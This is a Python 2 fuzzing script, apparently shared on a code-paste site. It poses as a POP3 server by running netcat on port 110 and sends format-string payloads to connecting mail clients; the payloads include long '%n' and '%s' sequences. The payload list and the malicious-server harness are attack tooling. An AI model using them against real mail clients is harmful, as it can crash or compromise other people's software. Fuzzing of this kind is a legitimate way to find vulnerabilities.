snippet: view plain - save this
1 #!/usr/bin/python
2 #
3 # 17/04/2007
4 # Created by : pilihat
5 # example:
6 # ./FuzzerPopClient.py
7 #
8 #
9
10 import os
11 import time
12 import fcntl
13
14 class doCmd:
15 def __init__(self,cmd,timeout=1,args=None):
16 self.cmd = cmd
17 self.fread = None
18 self.fwrite = None
19 self.timeout = timeout
20 self.args = args
21 self.current_cmd = ""
22 self.response = ""
23 self.write_error = 0
24
25 def __call__(self):
26 self.do_command()
27 self.no_wait_command()
28 return self
29
30 def do_command(self):
31 print self.cmd+" "+self.args
32 try:
33 self.fwrite,self.fread = os.popen2(self.cmd+" "+self.args)
34 except:
35 print "Failed to exec comand"
36 return "-1"
37
38 def no_wait_command(self):
39 # fdw = self.fwrite.fileno()
40 # flw = fcntl.fcntl(fdw, fcntl.F_GETFL)
41 # fcntl.fcntl(fdw, fcntl.F_SETFL, flw | os.O_NONBLOCK)
42
43 # fdr = self.fread.fileno()
44 # flr = fcntl.fcntl(fdr, fcntl.F_GETFL)
45 # fcntl.fcntl(fdr, fcntl.F_SETFL, flr | os.O_NONBLOCK)
46 return 0
47
48 def write_to_command(self, toWrite):
49 try:
50 self.current_cmd = toWrite
51 print "> Send "+toWrite
52 self.fwrite.write(toWrite+"\n")
53 self.fwrite.flush()
54 except:
55 self.write_error = self.write_error+1
56 print 'Command failed: '+toWrite
57 return "-2"
58
59 def read_from_command(self):
60 self.response=""
61 try:
62 self.fread.flush()
63 self.response = self.fread.readline()
64 if self.response != "":
65 print "< Read "+self.response
66 return self.response
67 except:
68 #print "Failed to read response after command "+self.current_cmd
69 return "-3"
70
71 def close_command(self):
72 self.fread.close()
73 self.fwrite.close()
74 return 0
75
76 def timeout_command(self):
77 time.sleep(self.timeout)
78
79
80 # taken from taof - http://sourceforge.net/projects/taof
81 formatstrings = ["", "", "", "%s" * 4, "%s" * 8, "%s" * 15, "%s" * 30, "%x" * 1024, "%n" * 1025 , "%s" * 2048, "%s%n%x%d" * 5000, "%s" * 30000, "%s" * 40000, "%.1024d", "%.2048d", "%.4096d", "%.8200d", "%99999999999s", "%99999999999d", "%99999999999x", "%99999999999n", "%99999999999s" * 1000, "%99999999999d" * 1000, "%99999999999x" * 1000, "%99999999999n" * 1000, "%08x" * 100, "%%20s" * 1000,"%%20x" * 1000,"%%20n" * 1000,"%%20d" * 1000, "%#0123456x%08x%x%s%p%n%d%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%#0123456x%%x%%s%%p%%n%%d%%o%%u%%c%%h%%l%%q%%j%%z%%Z%%t%%i%%e%%g%%f%%a%%C%%S%%08x"]
82
83 #formatstrings = ["%99999999999n","%99999999999s" * 1000, "%99999999999d" * 1000, "%99999999999x" * 1000, "%99999999999n" * 1000, "%08x" * 100, "%%20s" * 1000,"%%20x" * 1000,"%%20n" * 1000,"%%20d" * 1000, "%#0123456x%08x%x%s%p%n%d%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%#0123456x%%x%%s%%p%%n%%d%%o%%u%%c%%h%%l%%q%%j%%z%%Z%%t%%i%%e%%g%%f%%a%%C%%S%%08x"]
84
85 #formatstrings=["%%20d" * 1000,"%%20d" * 1000,"%%20d" * 1000]
86 #formatstrings=["1","2","3","4","5"]
87
88 def do_server_pop():
89 pop_server = doCmd("nc",2,"-l -p110 -v")
90 pop_server.do_command()
91 pop_server.no_wait_command()
92 pop_server.write_to_command("+OK")
93 return pop_server
94
95 def wait_client_response(pop_server, wait=2):
96 i=0
97 response = pop_server.read_from_command()
98 while response == "" or response =="-3":
99 pop_server.timeout_command()
100 response = pop_server.read_from_command()
101 i=i+1
102 if i>=wait:
103 i=0
104 return "-1"
105
106 return response
107
108 def fuzz_pop_client():
109 print "Connection"
110 #fuzzing
111
112 while 1:
113 pop_server = do_server_pop()
114 response = pop_server.read_from_command()
115
116 print "RESPONSE ---- : "+response
117 for f in formatstrings:
118 print "-------------- FUZZ -------------"
119 if pop_server.write_to_command(f)!= "-2":
120 response = pop_server.read_from_command()
121 print "RESPONSE ---- : "+response
122 else:
123 pop_server.close_command()
124 time.sleep(1)
125 pop_server = do_server_pop()
126
127 pop_server.write_to_command("QUIT")
128 pop_server.close_command()
129
130 if __name__ == "__main__":
131 fuzz_pop_client()
0 comments